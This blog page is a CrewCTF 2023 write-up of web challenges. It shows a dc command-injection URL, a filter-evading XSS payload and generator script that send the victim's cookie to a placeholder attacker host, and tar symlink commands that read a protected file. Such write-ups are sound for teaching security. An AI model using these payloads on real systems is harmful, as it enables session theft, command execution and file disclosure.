<!DOCTYPE html>
<head>
    <meta charset="utf-8">
<meta name="copyright" content="BASE">
<title>Siebene@ Blog</title>

<link rel='icon' type='image/png' href='/images/logo.png' />
<link rel='apple-touch-icon' sizes='180x180' href='/images/logo.png' />
<link rel='apple-touch-icon-precomposed' href='/images/logo.png' />

<link rel='canonical' href='/' />


<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0">


<meta http-equiv="X-UA-Compatible" content="IE=8 ; IE=9">
<meta name="description" content="Siebene@ Blog" />
<meta name="keywords" content="Siebene@ Blog,Siebene@,siebene@" />

<meta property="og:description" content="Siebene@ Blog" />
<meta property="og:title" content="Siebene@ Blog " />
<meta property="og:image" content="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif" />
<meta property="og:url" content="/" />
<meta property="og:site_name" content="Siebene@ Blog " />
<meta property="og:type" content="website" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@Siebene7" />
<meta name="twitter:url" content="/" />
<meta name="twitter:title" content="Siebene@ Blog " />
<meta name="twitter:description" content="Siebene@ Blog" />
<meta name="twitter:image" content="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif" />


<link rel="stylesheet" type="text/css" href="/css/search.css">

<link href='https://fonts.googleapis.com/css?family=Lato' rel='stylesheet' type='text/css'>

<link rel="stylesheet" type="text/css" href="/css/base.css">
<link rel="stylesheet" type="text/css" href="/css/windows.css">
<link rel="stylesheet" type="text/css" href="/css/BASEshop-24515246fb087d964f79.css"/>
<link rel="stylesheet" type="text/css" href="/css/github-markdown.css">

<style type="text/css">
body { 
        background-image: url("/images/bg.avif");     
        background-size: cover;
        background-attachment: fixed;
        background-repeat: no-repeat;
    }
</style>

<!-- metaCSS -->
<style type="text/css">
    .fontsize24 {
        font-size: 24px;
    }
    .fontsize28 {
        font-size: 28px;
    }
    .fontsize32 {
        font-size: 32px;
    }
    .fontsize36 {
        font-size: 36px;
    }
    .fontsize40 {
        font-size: 40px;
    }
    #logo.mincho, #windowHeader h1.mincho {
        font-family: "Hiragino Mincho ProN","Hiragino Mincho Pro",HGS明朝E,メイリオ,Meiryo,serif!important;
    }
    #logo.gothic, #windowHeader h1.gothic {
        font-family: 'Hiragino Kaku Gothic ProN','ヒラギノ角ゴ ProN W3',Meiryo,メイリオ,Osaka,'MS PGothic',arial,helvetica,sans-serif!important;
    }

    .appsItemCategoryTag_lowerLink {
        color: #1E2A86;
    }
        
    .logo_window h1 { font-family: 'Lato'; }
    .sp_logo h1 { font-family: 'Lato'; }
    
    /* ウィンドウヘッダーカラー */
    .window_header{
        background: navy;
    }
    .item_box section a {
        border-top: 24px solid navy;
    }
    @media screen and (max-width: 896px) {
        .item_box section a {
            border-top: none;
        }
    }
    .item_window_header{
    background: navy;
    }
</style>

<link rel="stylesheet" type="text/css" href="/css/label.css">

<meta name="cot:primaryColor" content="#000000">
<meta name="cot:accentColor" content="#000000">
<meta name="cot:textColor" content="#000000">
<meta name="cot:lightTextColor" content="#ffffff">
<meta name="cot:complementaryColor" content="#1E2A86">
<meta name="cot:titleColor" content="#000000">


<script src='/js/jquery.min.js'></script>
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div class="page">
    <div id="rightbar">
        <div class="sp sp_logo">
            <h1 class="fontsize32"><a href="/" id="logo" class="nothing"><img class="logoImage"
                        src="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif"
                        alt="Siebene@ Blog"></a></h1>
            <p class="tagline">おかえりなさい</p>
        </div>
        <!-- メニュー -->
        <div id="nav-drawer">
            <input id="nav-input" type="checkbox" class="nav-unshown">
                <label class="nav-unshown" id="nav-close" for="nav-input"></label>
                <label id="nav-open" for="nav-input">
                    <span></span>
                </label>

            <div id="sideContainer">
                <div class="pc logo_window">
                    <div class="window_header">
                        <span>Siebene@ Blog</span>
                        <div class="window_close">
                            <span></span>
                        </div>
                    </div>
                    <h1 class="fontsize32">
                        <a href="/" id="logo" class="nothing"><img class="logoImage" src="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif" alt="Siebene@ Blog">
                        </a>
                    </h1>
                    <p class="tagline">おかえりなさい</p>
                </div>

                <header id="windowHeader" class="hidden">
                    <div class="window_header">
                        <span>Menu</span>
                        <label for="nav-input">
                            <div class="window_close">
                                <span></span>
                            </div>
                        </label>
                    </div>

                    <div class="menu_window_container">
                        <div id="leftbar">
                            <div id="leftContent">
                                <nav id="global">
                                    <ul>
                                        <li id="home"><a class="mainHeaderNavColor" href="/">HOME</a></li>
                                        <li><a class="mainHeaderNavColor" href="/about">ABOUT</a></li>
                                        <li></li>
                                        <li class="languageSelect">
                                            <div id="i18" class="clearfix">
                                            </div>
                                        </li>
                                        <li class="sp"><a class="windowFooterNav" href="/">Privacy Policy</a></li>
                                        <li class="sp"><a class="windowFooterNav" href="/">Act on Specified Commercial Transactions</a></li>
                                    </ul>
                                </nav>
                            </div>
                        </div>
                    </div>
                </header>
            </div>
        </div>
        
        <div id="item_page_wrap">
            <section class="radius_box">
                <div id="second_column">
                    <div class="window_header">
                        <span>Spec</span>
                        <div class="window_close"><span></span></div>
                    </div>
                    <div class="item_page_window_container">
                        <div id="item_detail">
                            <p>CrewCTF2023-WriteUps</p>
                            <br>
                            <p>2023-07-11</p>
                            <section class="markdown-body">
                                <h2 id="sequence-gallery"><a href="#sequence-gallery" class="headerlink" title="sequence_gallery"></a>sequence_gallery</h2><p>This challenge is relatively straightforward, as there is parameter injection present in the code below.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proc = subprocess.run([<span class="string">&#x27;dc&#x27;</span>, script_file],capture_output=<span class="literal">True</span>,text=<span class="literal">True</span>,timeout=<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>According to the <a target="_blank" rel="noopener" href="https://www.gnu.org/software/bc/manual/dc-1.05/html_mono/dc.html">manual</a>.</p>
<blockquote>
<p><code>-e expr</code></p>
<p><code>--expression=expr</code></p>
<p>Evaluate expr as DC commands.</p>
<p><code>!</code></p>
<p>Will run the rest of the line as a system command. </p>
</blockquote>
<p>Execute arbitrary expressions using <code>expression</code>, and perform command injection using <code>!</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://sequence-gallery.chal.crewc.tf:8080/?sequence=--expression%3D%21cat%09fla*%0a</span><br></pre></td></tr></table></figure>

<h2 id="hex2dec"><a href="#hex2dec" class="headerlink" title="hex2dec"></a>hex2dec</h2><p>CSP</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta http-equiv=&quot;content-security-policy&quot; content=&quot;default-src &#x27;none&#x27;; script-src &#x27;unsafe-inline&#x27;;&quot;&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> params = <span class="keyword">new</span> <span class="title class_">URLSearchParams</span>(<span class="variable language_">document</span>.<span class="property">location</span>.<span class="property">search</span>.<span class="title function_">substring</span>(<span class="number">1</span>));</span><br><span class="line"><span class="keyword">const</span> v = params.<span class="title function_">get</span>(<span class="string">&quot;v&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="regexp">/^[0-f +-]+$/g</span>.<span class="title function_">test</span>(v)) &#123;</span><br><span class="line">	result.<span class="property">innerHTML</span> = <span class="string">`<span class="subst">$&#123;v&#125;</span> = <span class="subst">$&#123;<span class="built_in">parseInt</span>(v, <span class="number">16</span>)&#125;</span>`</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Although <code>0-f</code> seems fine, it actually refers to the index from 48 to 102 in ASCII, including uppercase letters and some symbols. With this discovery, I quickly came up with the outline of a payload.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">SVG</span> <span class="attr">ONLOAD</span>=<span class="string">I</span>=<span class="string">toString;S</span>=``[<span class="attr">constructor</span>][<span class="attr">fromCharCode</span>];<span class="attr">a</span>[&#x27;<span class="attr">parent</span>&#x27;][&#x27;<span class="attr">location</span>&#x27;][&#x27;<span class="attr">href</span>&#x27;]=`<span class="attr">HTTP</span>`+`<span class="attr">:</span>//`+<span class="attr">IP</span>+`?`+<span class="attr">a</span>[&#x27;<span class="attr">parent</span>&#x27;][&#x27;<span class="attr">document</span>&#x27;][&#x27;<span class="attr">cookie</span>&#x27;]&gt;</span><span class="tag">&lt;<span class="name">IMG</span>&gt;</span><span class="tag">&lt;<span class="name">IFRAME</span> <span class="attr">NAME</span>=<span class="string">a</span> <span class="attr">SRCDOC</span>=<span class="string">1</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>Considering CSP, in order to bring out the flag, a top-level jump such as <code>location</code> needs to be used. To obtain the <code>document</code> object, I injected an <code>&lt;iframe srcdoc=1 id=xx&gt;</code>, and then used <code>xx[parent][document]</code> to retrieve the <code>document</code>. Next, I referenced <code>jsfuck</code> and wrote a simplified version tailored to this problem.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="variable constant_">CONSTRUCTORS</span>=&#123;</span><br><span class="line">	<span class="string">&quot;constructor&quot;</span>:<span class="string">&quot;`c`+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[][[]]+[]][0][1]+[[7==1]+1][0][3]+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][0]+`c`+[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[7==7]+1][0][1]&quot;</span>,</span><br><span class="line">	<span class="string">&quot;toString&quot;</span>:<span class="string">&quot;[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+`S`+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[``+``[`c`+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[][[]]+[]][0][1]+[[7==1]+1][0][3]+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][0]+`c`+[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[7==7]+1][0][1]]][0][14]&quot;</span>,</span><br><span class="line">	<span class="string">&#x27;fromCharCode&#x27;</span>:<span class="string">&quot;`f`+[[7==7]+1][0][1]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+22[[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+`S`+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[``+``[`c`+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[][[]]+[]][0][1]+[[7==1]+1][0][3]+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][0]+`c`+[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[7==7]+1][0][1]]][0][14]]`23`+`C`+101[[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+`S`+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[``+``[`c`+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[][[]]+[]][0][1]+[[7==1]+1][0][3]+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][0]+`c`+[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[7==7]+1][0][1]]][0][14]]`21`[1]+`a`+[[7==7]+1][0][1]+`C`+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+`d`+`e`&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">MAPPING</span> = &#123;</span><br><span class="line">	<span class="string">&#x27;a&#x27;</span>:<span class="string">&#x27;`a`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;b&#x27;</span>:<span class="string">&#x27;`b`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;c&#x27;</span>:<span class="string">&#x27;`c`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;d&#x27;</span>:<span class="string">&#x27;`d`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;e&#x27;</span>:<span class="string">&#x27;`e`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;f&#x27;</span>:<span class="string">&#x27;`f`&#x27;</span>,</span><br><span class="line">	</span><br><span class="line">	<span class="string">&#x27;o&#x27;</span>:<span class="string">&#x27;[[][`a`+[[7==7]+1][0][0]]+``][0][6]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;i&#x27;</span>:<span class="string">&#x27;[1e1000+``][0][3]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;t&#x27;</span>:<span class="string">&#x27;[[7==7]+1][0][0]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;r&#x27;</span>:<span class="string">&#x27;[[7==7]+1][0][1]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;l&#x27;</span>:<span class="string">&#x27;[[7==1]+1][0][2]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;s&#x27;</span>:<span class="string">&#x27;[[7==1]+1][0][3]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;u&#x27;</span>:<span class="string">&#x27;[[][[]]+[]][0][0]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;y&#x27;</span>:<span class="string">&#x27;[1e1000+``][0][7]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;n&#x27;</span>:<span class="string">&#x27;[[][[]]+[]][0][1]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;i&#x27;</span>:<span class="string">&#x27;[[][[]]+[]][0][5]&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;g&#x27;</span>:<span class="string">&quot;[``+``[`c`+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[][[]]+[]][0][1]+[[7==1]+1][0][3]+[[7==7]+1][0][0]+[[7==7]+1][0][1]+[[][[]]+[]][0][0]+`c`+[[7==7]+1][0][0]+[[][`a`+[[7==7]+1][0][0]]+``][0][6]+[[7==7]+1][0][1]]][0][14]&quot;</span>,</span><br><span class="line">	<span class="comment">// &#x27;S&#x27;:&quot;`S`&quot;,</span></span><br><span class="line">	<span class="comment">// &#x27;C&#x27;:&quot;`C`&quot;,</span></span><br><span class="line">	<span class="string">&#x27;h&#x27;</span>:<span class="string">&quot;101[toString]`21`[1]&quot;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;p&#x27;</span>:<span class="string">&#x27;211[toString]`31`[1]&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;k&#x27;</span>:<span class="string">&#x27;20[toString]`21`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;v&#x27;</span>:<span class="string">&#x27;31[toString]`32`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;w&#x27;</span>:<span class="string">&#x27;32[toString]`33`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;z&#x27;</span>:<span class="string">&#x27;35[toString]`36`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;j&#x27;</span>:<span class="string">&#x27;19[toString]`20`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;m&#x27;</span>:<span class="string">&#x27;22[toString]`23`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;x&#x27;</span>:<span class="string">&#x27;101[toString]`34`[1]&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;q&#x27;</span>:<span class="string">&#x27;26[toString]`27`&#x27;</span>.<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="string">&quot;I&quot;</span>),</span><br><span class="line">	<span class="string">&#x27;:&#x27;</span>:<span class="string">&#x27;S`58`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;/&#x27;</span>:<span class="string">&#x27;S`47`&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;.&#x27;</span>:<span class="string">&#x27;S`46`&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// console.log(Object.keys(MAPPING).length)</span></span><br><span class="line"><span class="comment">// console.log(MAPPING)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">EXP</span>=&#123;</span><br><span class="line">	<span class="string">&quot;parent&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&quot;location&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&quot;href&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&quot;atob&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&quot;document&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&quot;cookie&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&quot;://&quot;</span>:<span class="string">&quot;&quot;</span>,</span><br><span class="line">	<span class="string">&#x27;.&#x27;</span>:<span class="string">&#x27;S`46`&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">let</span> exp=<span class="string">&quot;&lt;SVG ONLOAD=I=toString;S=``[constructor][fromCharCode];a[&#x27;parent&#x27;][&#x27;location&#x27;][&#x27;href&#x27;]=`HTTP`+&#x27;://&#x27;+`x`+&#x27;.&#x27;+`x`+&#x27;.&#x27;+`x`+&#x27;.&#x27;+`x?`+a[&#x27;parent&#x27;][&#x27;document&#x27;][&#x27;cookie&#x27;]&gt;&lt;IMG&gt;&lt;IFRAME NAME=a SRCDOC=1&gt;&quot;</span>.<span class="title function_">replace</span>(<span class="string">&quot;constructor&quot;</span>,<span class="variable constant_">CONSTRUCTORS</span>[<span class="string">&quot;constructor&quot;</span>]).<span class="title function_">replace</span>(<span class="string">&quot;fromCharCode&quot;</span>,<span class="variable constant_">CONSTRUCTORS</span>[<span class="string">&quot;fromCharCode&quot;</span>]).<span class="title function_">replace</span>(<span class="string">&quot;toString&quot;</span>,<span class="variable constant_">CONSTRUCTORS</span>[<span class="string">&quot;toString&quot;</span>])</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">isUpperCase</span>(<span class="params">str</span>) &#123;</span><br><span class="line">  <span class="keyword">return</span> str === str.<span class="title function_">toUpperCase</span>() &amp;&amp; str!=<span class="string">&#x27;:&#x27;</span> &amp;&amp; str!=<span class="string">&#x27;/&#x27;</span> &amp;&amp; str!=<span class="string">&#x27;.&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (key <span class="keyword">in</span> <span class="variable constant_">EXP</span>)&#123;</span><br><span class="line">	<span class="comment">// console.log(key)</span></span><br><span class="line">	s=<span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span>(i <span class="keyword">in</span> key)&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_">isUpperCase</span>(key.<span class="title function_">charAt</span>(i)))&#123;</span><br><span class="line"></span><br><span class="line">			s = s + <span class="string">&#x27;`&#x27;</span>+key.<span class="title function_">charAt</span>(i)+<span class="string">&#x27;`+&#x27;</span></span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">			s = s+<span class="variable constant_">MAPPING</span>[key.<span class="title function_">charAt</span>(i)]+<span class="string">&quot;+&quot;</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="variable constant_">EXP</span>[key]=s.<span class="title function_">slice</span>(<span class="number">0</span>, -<span class="number">1</span>)</span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(key+<span class="string">&quot; is: &quot;</span>+s.<span class="title function_">slice</span>(<span class="number">0</span>, -<span class="number">1</span>)+<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> pattern = <span class="regexp">/&#x27;([^&#x27;]*)&#x27;/g</span>;</span><br><span class="line"><span class="keyword">let</span> match;</span><br><span class="line"><span class="keyword">while</span> ((match = pattern.<span class="title function_">exec</span>(exp))) &#123;</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(match[<span class="number">1</span>]);</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="variable constant_">EXP</span>)</span><br><span class="line">  exp = exp.<span class="title function_">replace</span>(<span class="string">&quot;&#x27;&quot;</span>+match[<span class="number">1</span>]+<span class="string">&quot;&#x27;&quot;</span>,<span class="variable constant_">EXP</span>[match[<span class="number">1</span>]])</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(exp)</span><br></pre></td></tr></table></figure>

<p>However, this is unintended. The author actually intended to use <code>HTMLAnchorElement.toString</code> to obtain lowercase letters, as can be seen in the following example.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;A <span class="variable constant_">ID</span>=A <span class="variable constant_">HREF</span>=<span class="attr">ABCDEFGHIJKLMNOPQRSTUVWXYZ</span>:&gt;&lt;/A&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml"><span class="variable language_">console</span>.<span class="title function_">log</span>(A+<span class="string">&quot;&quot;</span>) <span class="comment">//abcdefghijklmnopqrstuvwxyz:</span></span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="archive-stat-viewer"><a href="#archive-stat-viewer" class="headerlink" title="archive_stat_viewer"></a>archive_stat_viewer</h2><ul>
<li>Users can upload tar files, and <code>/web-apps/src/archives</code> will create a directory with a UUID and save the tar file in that directory.</li>
<li>The saved tar file will be located at <code>$&#123;UUID&#125;/archive.tar</code>.</li>
<li>The contents of the tar file will be extracted and saved in the <code>$&#123;UUID&#125;/files/</code> directory.</li>
<li>Information about the files in the <code>files</code> directory will be recorded in the <code>$&#123;UUID&#125;/result.json</code> file.</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">extract_archive</span>(<span class="params">archive_path, extract_folder</span>):</span><br><span class="line">    <span class="keyword">with</span> tarfile.<span class="built_in">open</span>(archive_path) <span class="keyword">as</span> archive:</span><br><span class="line">        <span class="keyword">for</span> member <span class="keyword">in</span> archive.getmembers():</span><br><span class="line">            <span class="keyword">if</span> member.name[<span class="number">0</span>] == <span class="string">&#x27;/&#x27;</span> <span class="keyword">or</span> <span class="string">&#x27;..&#x27;</span> <span class="keyword">in</span> member.name: <span class="comment"># 防止绝对路径，目录穿越</span></span><br><span class="line">                <span class="keyword">raise</span> HackingException(<span class="string">&#x27;Malicious archive&#x27;</span>)</span><br><span class="line">        archive.extractall(extract_folder)</span><br></pre></td></tr></table></figure>

<p>Python’s <code>tar</code> module can include symbolic links.</p>
<p>This challenge is similar to a challenge I encountered when I first started learning CTF. I remember that the steps for that challenge involved uploading a symbolic link <code>xxx</code> that points to the <code>www</code> directory, followed by uploading <code>xxx/shell</code>, which would extract the <code>shell</code> file to the <code>www</code> directory.</p>
<p>This challenge is similar in that all that is needed is to replace <code>$&#123;UUID&#125;/result.json</code> with a symbolic link that points to the flag. First, upload any tar file and record its uuid.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ln</span> -s /web-apps/src/archives/uuid xxx</span><br><span class="line">tar -cvf exp.tar xxx</span><br><span class="line"><span class="built_in">rm</span> xxx</span><br><span class="line"></span><br><span class="line"><span class="built_in">mkdir</span> xxx</span><br><span class="line"><span class="built_in">ln</span> -s /web-apps/src/flag.txt result.json</span><br><span class="line"><span class="built_in">cp</span> result.json xxx/result.json</span><br><span class="line"></span><br><span class="line">tar -rf exp.tar xxx/result.json</span><br><span class="line"><span class="built_in">rm</span> -rf xxx</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># tar -tvf exp.tar</span></span><br><span class="line">lrwxrwxrwx root/root         0 2023-07-9 14:03 xxx -&gt; /web-apps/src/archives/uuid</span><br><span class="line">lrwxrwxrwx root/root         0 2023-07-9 14:04 xxx/result.json -&gt; /web-apps/src/flag.txt</span><br></pre></td></tr></table></figure>



<h2 id="safe-proxy"><a href="#safe-proxy" class="headerlink" title="safe_proxy"></a>safe_proxy</h2><p>I was unable to solve this challenge because I first consulted the Deno official manual and did not see that <code>fetch</code> supports the <code>file://</code> protocol, so I did not consider the <code>file://</code> protocol. </p>
<p>You can refer to the official writeup or this link <a target="_blank" rel="noopener" href="https://nanimokangaeteinai.hateblo.jp/entry/2023/07/10/063030">https://nanimokangaeteinai.hateblo.jp/entry/2023/07/10/063030 ↗</a> for more information.</p>

                            </section>
                        </div>
                        <input type="hidden" name="AdditionalItemDetailDefaultCssAndJs" value="true">
                    </div>
                </div>
            </section>
        <!-- ショップレビュー -->
        </div>
        <br class="clear">
    </div>
</div>
</body>
    <footer id="windowFooter">
    <nav id="info">
        <ul class="clearfix">
            <li><a class="windowFooterNav" href="/">HOME</a></li>
            <li class="pc"><a class="windowFooterNav" href="/">Privacy Policy</a></li>
            <li class="pc"><a class="windowFooterNav" href="/">Act on Specified Commercial Transactions</a></li>
            <li>
                <div class="socialBtnList clearfix boxRight">
                    <div class="fb sns">
                        <div class="fb-share-button" data-href="/" data-layout="button_count" data-size="small" data-mobile-iframe="true"><a class="fb-xfbml-parse-ignore" target="_blank" href="https://github.com/Siebene">Github</a></div>
                    </div>
                    <div class="tw sns">
                        <a target="_blank" rel="noopener" href="https://x.com/Siebene7" class="twitter-share-button" data-url="https://x.com/Siebene7" data-lang="ja" data-hashtags="" data-via="Siebene@" data-text="Siebene@ Blog">Twitter!</a>
